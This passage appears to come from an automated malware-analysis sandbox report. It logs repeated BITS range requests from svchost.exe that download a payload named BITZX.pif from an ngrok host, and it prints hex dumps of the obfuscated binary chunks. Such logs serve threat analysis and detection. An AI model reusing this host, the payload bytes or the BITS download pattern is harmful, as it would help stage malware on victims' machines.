        2024-12-16 16:40:09 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 197
        Content-Range: bytes 3071-3267/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:09 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:09 UTC197INData Raw: 04 7b ff 67 00 04 39 57 ff ff ff 26 20 00 00 00 00 38 4c ff ff ff 7e 0f 00 00 04 28 3b 01 00 06 7e 4c 68 00 04 28 8b f9 00 06 80 0f 00 00 04 20 01 00 00 00 7e 2b 68 00 04 7b ff 67 00 04 39 1f ff ff ff 26 20 00 00 00 00 38 14 ff ff ff 7e 12 00 00 04 28 3b 01 00 06 7e 4c 68 00 04 28 8b f9 00 06 80 12 00 00 04 20 05 00 00 00 7e 2b 68 00 04 7b 37 68 00 04 3a e7 fe ff ff 26 20 05 00 00 00 38 dc fe ff ff 7e 15 00 00 04 28 3b 01 00 06 7e 4c 68 00 04 28 8b f9 00 06 80 15 00 00 04 20 08 00 00 00 7e 2b 68 00 04 7b 0d 68 00 04 39 af fe ff ff 26 20 09 00 00 00 38 a4 fe ff ff 7e 0d 00 00 04 28 3b
        Data Ascii: {g9W& 8L~(;~Lh( ~+h{g9& 8~(;~Lh( ~+h{7h:& 8~(;~Lh( ~+h{h9& 8~(;


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        12192.168.11.20497263.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:11 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=3268-3642
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:12 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 375
        Content-Range: bytes 3268-3642/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:11 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:12 UTC375INData Raw: 01 00 06 7e 4c 68 00 04 28 8b f9 00 06 80 0d 00 00 04 20 07 00 00 00 38 81 fe ff ff 7e 11 00 00 04 28 3b 01 00 06 7e 4c 68 00 04 28 8b f9 00 06 80 11 00 00 04 20 04 00 00 00 38 5e fe ff ff 7e 19 00 00 04 28 3b 01 00 06 7e 4c 68 00 04 28 8b f9 00 06 80 19 00 00 04 20 02 00 00 00 38 3b fe ff ff 7e 16 00 00 04 28 3b 01 00 06 7e 4c 68 00 04 28 8b f9 00 06 80 16 00 00 04 20 08 00 00 00 7e 2b 68 00 04 7b fc 67 00 04 3a 0e fe ff ff 26 20 02 00 00 00 38 03 fe ff ff dd d7 fc ff ff 25 7e 4d 68 00 04 28 8f f9 00 06 13 02 20 01 00 00 00 7e 2b 68 00 04 7b 3c 68 00 04 39 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 05 00 45 03 00 00 00 47 00 00 00 2e 00 00 00 05 00 00 00 38 42 00 00 00 7e 4f 68 00 04 28 97 f9 00 06 20 00 00 00 00 7e 2b 68 00 04 7b 0e 68 00 04 3a
        Data Ascii: ~Lh( 8~(;~Lh( 8^~(;~Lh( 8;~(;~Lh( ~+h{g:& 8%~Mh( ~+h{<h9& 8EG.8B~Oh( ~+h{h:


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        13192.168.11.20497273.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:16 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=3643-4266
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:16 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 624
        Content-Range: bytes 3643-4266/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:16 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:16 UTC624INData Raw: 04 7b e2 67 00 04 3a 57 fb ff ff 26 20 07 00 00 00 38 4c fb ff ff 00 00 00 41 1c 00 00 00 00 00 00 a1 01 00 00 3e 02 00 00 df 03 00 00 8d 00 00 00 2d 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 4c 00 00 00 00 00 00 2e 00 00 00 94 00 00 00 c2 00 00 00 70 00 00 00 2d 00 00 01 02 00 00 00 7d 01 00 00 93 05 00 00 10 07 00 00 68 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 6e 07 00 00 9c 07 00 00 70 00 00 00 2d 00 00 01 12 00 00 00 2a 00 00 00 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 05 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00
        Data Ascii: {g:W& 8LA>-0*AL.p-}h.np-**0*0*********


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        14192.168.11.20497283.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:18 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=4267-4440
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:18 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 174
        Content-Range: bytes 4267-4440/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:17 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:18 UTC174INData Raw: 00 04 39 05 ff ff ff 26 20 00 00 00 00 38 fa fe ff ff 14 80 20 00 00 04 20 08 00 00 00 7e 2b 68 00 04 7b 36 68 00 04 3a e0 fe ff ff 26 20 01 00 00 00 38 d5 fe ff ff 14 80 23 00 00 04 20 05 00 00 00 38 c5 fe ff ff 16 80 1c 00 00 04 20 0b 00 00 00 38 b5 fe ff ff 7e 0f 00 00 04 80 24 00 00 04 20 02 00 00 00 7e 2b 68 00 04 7b 1a 68 00 04 39 97 fe ff ff 26 20 03 00 00 00 38 8c fe ff ff 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 34 00 00 00 00 00 00 11 01 00 00 9d
        Data Ascii: 9& 8 ~+h{6h:& 8# 8 8~$ ~+h{h9& 80*0*A4


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        15192.168.11.20497293.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:21 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=4441-4603
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:21 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 163
        Content-Range: bytes 4441-4603/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:20 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:21 UTC163INData Raw: 00 00 00 ae 01 00 00 6d 00 00 00 2d 00 00 01 00 00 00 00 2c 00 00 00 46 03 00 00 72 03 00 00 70 00 00 00 2d 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 41 34 00 00 00 00 00 00 2d 00 00 00 c5 02 00 00 f2 02 00 00 84 00 00 00 2d 00 00 01 02 00 00 00 2d 00 00 00 49 03 00 00 76 03 00 00 42 00 00 00 00 00 00 00 13 30 07 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 01 10 00 00 00 00 2f 00 be ed 00 fa 2d 00 00 01 03 30 08 00 04 00 00 00
        Data Ascii: m-,Frp-0*A4---IvB0*0*/-0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        16192.168.11.20497303.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:23 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=4604-4786
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:23 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 183
        Content-Range: bytes 4604-4786/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:23 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:23 UTC183INData Raw: 00 00 00 00 00 00 14 2a 41 1c 00 00 00 00 00 00 2f 00 00 00 14 01 00 00 43 01 00 00 df 00 00 00 2d 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 01 10 00 00 00 00 2f 00 9a c9 00 c7 2d 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 41 4c 00 00 02 00 00 00 2f 01 00 00 4a 01 00 00 79 02 00 00 7b 00 00 00 00 00 00 00 02 00 00 00 de 00 00 00 01 03 00 00 df 03 00 00 68 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 3c 04 00 00 6b 04 00 00 db 00 00 00 2d 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 41 34 00 00 02 00 00
        Data Ascii: *A/C-0*/-0*AL/Jy{h/<k-0*A4


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        17192.168.11.20497313.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:25 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=4787-4997
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:25 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 211
        Content-Range: bytes 4787-4997/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:24 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:25 UTC211INData Raw: 00 7c 00 00 00 39 01 00 00 b5 01 00 00 90 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 ab 02 00 00 da 02 00 00 f3 00 00 00 2d 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 41 1c 00 00 00 00 00 00 2f 00 00 00 e5 01 00 00 14 02 00 00 df 00 00 00 2d 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 41 1c 00 00 00 00 00 00 2f 00 00 00 42 02 00 00 71 02 00 00 f1 00 00 00 2d 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 1c 00 00 00 00 00 00 aa 00 00 00 b3 04 00 00 5d 05 00 00 c8 00 00 00 2d 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 01 10 00 00 00 00 2d 00 3c 69 00 70 2d 00 00 01 03 30
        Data Ascii: |9/-0*A/-0*A/Bq-0*A]-0*-<ip-0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        18192.168.11.20497323.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:27 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=4998-5040
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:27 UTC311INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 43
        Content-Range: bytes 4998-5040/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:27 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:27 UTC43INData Raw: 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 4c 00 00 02 00 00 00 e6 00 00 00 78 01 00 00 5e 02 00 00 7b 00 00 00 00 00 00 00 00
        Data Ascii: *ALx^{


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        19192.168.11.20497333.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:31 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=5041-5223
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:31 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 183
        Content-Range: bytes 5041-5223/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:30 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:31 UTC183INData Raw: 00 00 00 a9 00 00 00 54 02 00 00 fd 02 00 00 84 00 00 00 2d 00 00 01 02 00 00 00 38 00 00 00 6d 03 00 00 a5 03 00 00 7b 00 00 00 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 01 10 00 00 00 00 2d 00 47 74 00 84 2d 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 01 34 00 00 00 00 e8 02 6e 56 03 70 2d 00 00 01 00 00 e6 03 6e 54 04 70 2d 00 00 01 00 00 4c 00 8b d7 00 70 2d 00 00 01 00 00 67 01 8b f2 01 70 2d 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 01 10 00 00 00 00 2d 00 9a c7 00 6d 2d 00 00 01 03 30 08 00
        Data Ascii: T-8m{0*-Gt-0*4nVp-nTp-Lp-gp-0*-m-0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        20192.168.11.20497343.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:34 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=5224-5344
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:34 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 121
        Content-Range: bytes 5224-5344/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:33 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:34 UTC121INData Raw: 04 00 00 00 00 00 00 00 00 00 00 2a 41 1c 00 00 00 00 00 00 2d 00 00 00 6d 01 00 00 9a 01 00 00 70 00 00 00 2d 00 00 01 12 00 00 00 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12
        Data Ascii: *A-mp-*0********


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        21192.168.11.20497353.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:38 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=5345-5581
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:38 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 237
        Content-Range: bytes 5345-5581/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:38 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:38 UTC237INData Raw: 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00
        Data Ascii: ******************************


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        22192.168.11.20497363.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:41 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=5582-5863
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:41 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 282
        Content-Range: bytes 5582-5863/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:41 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:41 UTC282INData Raw: 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 c4 00 00 00 01 00 00 11 28 43 f5 00 06 20 04 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 05 00 00 00 39 00 00 00 05 00 00 00 38 00 00 00 5d 00 00 00 81 00 00 00 38 34 00 00 00 7e 24 00 00 04 7e 44 68 00 04 28 6b f9 00 06 80 29 00 00 04 20 00 00 00 00 7e 2b 68 00 04 7b 1c 68 00 04 3a ba ff ff ff 26 20 02 00 00 00 38 af ff ff ff 2a 28 29 f6 00 06 20 01 00 00 00 7e 2b 68 00 04 7b 1e 68 00 04 39 95 ff ff ff 26 20 00 00 00 00 38 8a ff ff ff 28 3b f5 00 06 20 00 00 00 00 7e 2b 68 00 04 7b 21 68 00 04 39 71 ff ff ff 26 20 00 00 00 00 38 66 ff ff ff 28 39 f5 00 06 20 03 00
        Data Ascii: *******0(C 8E98]84~$~Dh(k) ~+h{h:& 8*() ~+h{h9& 8(; ~+h{!h9q& 8f(9


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        23192.168.11.20497373.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:44 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=5864-6280
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:44 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 417
        Content-Range: bytes 5864-6280/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:44 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:44 UTC417INData Raw: 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 f4 00 00 00 00 00 00 8b 15 00 00 90 00 00 00 1b 16 00 00 6d 00 00 00 2d 00 00 01 00 00 00 00 76 0f 00 00 45 00 00 00 bb 0f 00 00 70 00 00 00 2d 00 00 01 00 00 00 00 f3 12 00 00 45 00 00 00 38 13 00 00 70 00 00 00 2d 00 00 01 00 00 00 00 4f 05 00 00 45 00 00 00 94 05 00 00 70 00 00 00 2d 00 00 01 00 00 00 00 ae 1f 00 00 45 00 00 00 f3 1f 00 00 70 00 00 00 2d 00 00 01 00 00 00 00 9d 02 00 00 e7 00 00 00 84 03 00 00 f1 00 00 00 2d 00 00 01 00 00 00 00 87 17 00 00 a6 00 00 00 2d 18 00 00 6d 00 00 00 2d 00 00 01 00 00 00 00 83 1a 00 00 d4 00 00 00 57 1b 00 00 6d 00 00 00 2d 00 00 01 00 00 00 00 87 17 00 00 71 05 00 00 f8 1c 00 00 70 00 00 00 2d 00 00 01 00 00 00 00 25 00 00 00 72 20 00 00 97 20 00 00 a4 00 00
        Data Ascii: 0*Am-vEp-E8p-OEp-Ep---m-Wm-qp-%r


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        24192.168.11.20497383.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:46 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=6281-6515
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:46 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 235
        Content-Range: bytes 6281-6515/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:46 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:46 UTC235INData Raw: 00 00 00 00 00 00 00 00 00 00 2a 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 01 1c 00 00 00 00 e9 00 90 79 01 6d 2d 00 00 01 02 00 a5 02 05 aa 02 68 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 17 2a 41 1c 00 00 00 00 00 00 73 00 00 00 08 01 00 00 7b 01 00 00 70 00 00 00 2d 00 00 01 13 30 0a 00 04 00 00 00 00 00 00 00 00 00 00 2a 03 30 08 00 04 00 00 00 00 00 00 00 00 00 14 2a 41 1c 00 00 00 00 00 00 25 00 00 00 47 01 00 00 6c 01 00 00 70 00 00 00 2d 00 00 01 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16
        Data Ascii: *0*ym-h0*As{p-0*0*A%Glp-0*0******


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        25192.168.11.20497393.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:48 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=6516-6591
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:48 UTC311INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 76
        Content-Range: bytes 6516-6591/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:47 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:48 UTC76INData Raw: 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00
        Data Ascii: **********


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        26192.168.11.20497403.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:52 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=6592-7075
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:52 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 484
        Content-Range: bytes 6592-7075/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:52 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:52 UTC484INData Raw: 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 1c 00 00 00 00 00 00 2d 00 00 00 82 02 00 00 af 02 00 00 70 00 00 00 2d 00 00 01 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00
        Data Ascii: *******************0*0*A-p-.(C(9***0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        27192.168.11.20497413.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:55 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=7076-7175
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:56 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 100
        Content-Range: bytes 7076-7175/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:55 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
